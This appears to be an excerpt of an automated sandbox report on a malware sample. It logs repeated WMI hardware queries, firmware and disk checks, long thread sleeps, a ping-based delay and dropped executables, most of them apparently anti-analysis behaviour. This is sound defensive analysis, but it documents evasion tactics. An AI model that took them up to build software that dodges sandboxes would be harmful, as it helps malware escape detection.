                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Size FROM Win32_LogicalDisk WHERE DriveType = 3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSystem information queried: FirmwareTableInformation
                      Source: ufhjbuw, 00000003.00000002.1987883252.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, ufhjbuw, 00000022.00000002.2579041639.0000000000727000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599867
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599719
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599586
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597047
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596891
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596719
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596591
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596449
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596290
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595813
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595658
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595531
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595031
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594697
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594531
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594359
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594191
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594031
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593886
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593318
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593125
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592959
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592688
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592375
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592092
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591828
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591266
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591076
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590883
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590686
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590344
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589953
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589797
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589625
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589453
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589219
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589094
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 365Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1550Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 695Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 385Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 789Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 762Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeWindow / User API: threadDelayed 446
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 458
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ZooJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifAPI coverage: 4.5 %
                      Source: C:\Windows\explorer.exe TID: 6532Thread sleep time: -155000s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 1236Thread sleep time: -69500s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 2668Thread sleep time: -32300s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 6532Thread sleep time: -38500s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4577.exe TID: 1196Thread sleep count: 446 > 30
                      Source: C:\Users\user\AppData\Local\Temp\4577.exe TID: 1196Thread sleep time: -44600s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exe TID: 6440Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6920Thread sleep time: -90000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 3608Thread sleep time: -30000s >= -30000s
                      Source: C:\ProgramData\Drivers\csrss.exe TID: 2912Thread sleep count: 260 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -600000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -599867s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -599719s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -599586s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -599235s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -598781s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -597781s >= -30000s
